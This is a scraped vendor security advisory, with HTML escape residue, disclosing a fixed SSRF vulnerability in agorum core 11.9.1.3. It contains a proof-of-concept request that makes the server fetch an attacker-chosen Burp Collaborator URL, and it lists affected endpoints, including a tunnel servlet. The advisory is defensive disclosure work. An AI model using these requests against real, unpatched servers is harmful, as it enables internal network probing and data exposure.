Affected Version<\/strong>: 11.9.1.3-1857
Vulnerability Type<\/strong>: Server-Side Request Forgery (SSRF) (CWE-918)
Security Risk<\/strong>: High
Vendor<\/strong>: Agorum
Vendor URL<\/strong>: https:\/\/www.agorum.com\/<\/a>
Vendor acknowledged vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE Number<\/strong>: Requested
CVE Link<\/strong>: Requested
Advisory ID<\/strong>: usd-2025-0025<\/p>\n
Description<\/h3>\n
agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.<\/p>\n
Proof of Concept<\/h3>\n
Several endpoints in the application are vulnerable to Server-Side Request Forgery (SSRF). This allows attackers to craft requests that cause the server to initiate connections to arbitrary internal or external resources, potentially exposing sensitive information or enabling further attacks.<\/p>\n
The following request demonstrates the SSRF vulnerability. When submitted, the server makes a request to the specified URL:<\/p>\n
<\/span>GET<\/span> \/roiwebui\/desk4web_module\/gadgets\/rssreader\/RSSReader.jsp?reloadTime=600000);}&feed=[http:\/\/etbjk99mmtvsce0wjfkmjof3zu5ntdh2.burp.usd.de\/ssrf]()<\/span> HTTP<\/span>\/<\/span>1.1
<\/span>Host<\/span>:<\/span> localhost
<\/span>[...]<\/span><\/pre>\n<\/div>\nIn the response, it is evident that the server has fetched content from the target resource, confirming the SSRF behavior:<\/p>\n
\n<\/span>HTTP<\/span>\/<\/span>1.1<\/span> 200<\/span> OK
<\/span>X-Powered-By<\/span>:<\/span> agorum core
<\/span>Content-Type<\/span>:<\/span> text\/html;charset=ISO-8859-1
<\/span>Content-Length<\/span>:<\/span> 1422
<\/span>Date<\/span>:<\/span> Fri, 02 May 2025 07:48:55 GMT
<\/span>Server<\/span>:<\/span> Apache-Coyote\/1.1
<\/span>[...]
<\/span> <<\/span>body<\/span> onload<\/span>=<\/span>\"initReload()\"<\/span>>
<\/span> <<\/span>div<\/span> class<\/span>=<\/span>\"tableblock\"<\/span>>
<\/span> <<\/span>table<\/span>>
<\/span> <!-- <html><body>xjiz55z1r9egabbtzruo7czjlgigz<\/body><\/html>-->
<\/span> <<\/span>th<\/span>><\/span>null<\/<\/span>th<\/span>>
<\/span> <\/<\/span>table<\/span>>
<\/span> <\/<\/span>div<\/span>>
<\/span> <\/<\/span>body<\/span>>
<\/span>[...]<\/pre>\n<\/div>\nTo further demonstrate the server's outbound request capabilities, a payload was sent to a Burp Collaborator URL. The interaction received confirms the SSRF vulnerability and shows that the server can establish external network connections:<\/p>\n
![\"\"](\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/06\/ssrf.png\")
<\/p>\n
The vulnerability is present in multiple locations. The following is a non-exhaustive list of affected endpoints:<\/p>\n
\n- \/roiwebui\/desk4web_module\/gadgets\/rssreader\/RSSReader.jsp<\/strong><\/li>\n
- \/roiwebui\/TunnelServlet?tunnelAddress=127.0.0.1&tunnelPort=1234<\/strong><\/li>\n<\/ul>\n
Fix<\/h3>\n
It is recommended to evaluate whether making server-side requests is necessary for the functionality of the application.
Should this is the case, the security measures to be implemented depend on the type of server-side requests:
If the application only needs to be able to make requests to a precisely defined set of systems, these can be included in an allowlist.
On the other hand, if the application should be able to make requests to arbitrary external resources via the Internet, an allowlist cannot be used, as for this purpose it is not possible to define a set of permitted systems in advance.
Instead, a ruleset describing disallowed requests, a denylist, should be defined to reflect the expected format of legitimate requests.<\/p>\n
<\/p>\n
Users of agorum core open can upgrade to versions 11.9.2 and 11.10.1.<\/p>\n
References<\/h3>\n
<\/p>\n